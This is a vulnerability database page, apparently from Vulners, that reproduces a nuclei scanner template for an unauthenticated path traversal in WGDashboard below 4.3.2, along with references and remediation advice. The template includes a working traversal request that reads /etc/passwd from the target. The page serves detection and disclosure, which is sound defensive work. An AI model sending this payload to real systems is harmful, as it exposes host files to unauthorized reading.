Lucene search
+L

WGDashboard < 4.3.2 - Unauthenticated File Read

🗓️ 10 Sep 2026 04:50:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

Unauthenticated path traversal in WGDashboard below 4.3.2 exposes host file system.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-44343
12 May 202616:39
attackerkb
cnnvd
CNNVD
WGDashboard 输入验证错误漏洞
12 May 202600:00
cnnvd
cve
CVE
CVE-2026-44343
12 May 202616:39
cve
cvelist
Cvelist
CVE-2026-44343 WGDashboard: Critical Vulnerability in 4.3.2
12 May 202616:39
cvelist
euvd
EUVD
EUVD-2026-29732
12 May 202616:39
euvd
nvd
NVD
CVE-2026-44343
12 May 202618:17
nvd
ptsecurity
Positive Technologies
PT-2026-40268
12 May 202600:00
ptsecurity
redhatcve
RedhatCVE
CVE-2026-44343
5 Jun 202619:11
redhatcve
vulnrichment
Vulnrichment
CVE-2026-44343 WGDashboard: Critical Vulnerability in 4.3.2
12 May 202616:39
vulnrichment
id: CVE-2026-44343

info:
  name: WGDashboard < 4.3.2 - Unauthenticated File Read
  author: str4k3r
  severity: critical
  description: |
    WGDashboard < 4.3.2 contains a path traversal vulnerability caused by improper access control, letting unauthorized attackers access the host file system without authentication.
  impact: |
    Unauthorized attackers can access the host file system, potentially exposing sensitive data and compromising the system.
  remediation: |
    Update to version 4.3.2 or later.
  reference:
    - https://github.com/WGDashboard/WGDashboard/security/advisories/GHSA-rrf5-q4fp-qvgm
    - https://github.com/WGDashboard/WGDashboard/commit/b15bbce9bc5554ec379d558f032c730db47fcea2
    - https://nvd.nist.gov/vuln/detail/CVE-2026-44343
  classification:
    cve-id: CVE-2026-44343
    epss-score: 0.01548
    epss-percentile: 0.7353
    cwe-id: CWE-22
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 2
    vendor: wgdashboard
    product: wgdashboard
    fofa-query: title="WGDashboard"
  tags: cve,cve2026,wgdashboard,lfi,path-traversal,file-read,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "wgdashboard", "wireguard")'
        condition: and
        internal: true

  - raw:
      - |
        GET /fileDownload?file=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:x:0:0:")'
        condition: and
# digest: 4a0a00473045022100ad3f06581fc4b3ae9436662f53c2a2c7291ffc83bb0597ee64e3f4d17e9a2d3b02207270894b19572f254223e3a2794df2812aef065e6dde7b93a96eaf09b2a1a5aa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Sep 2026 07:12Current
CVSS 3.19.8
CVSS 49.3
EPSS0.01548
SSVC
2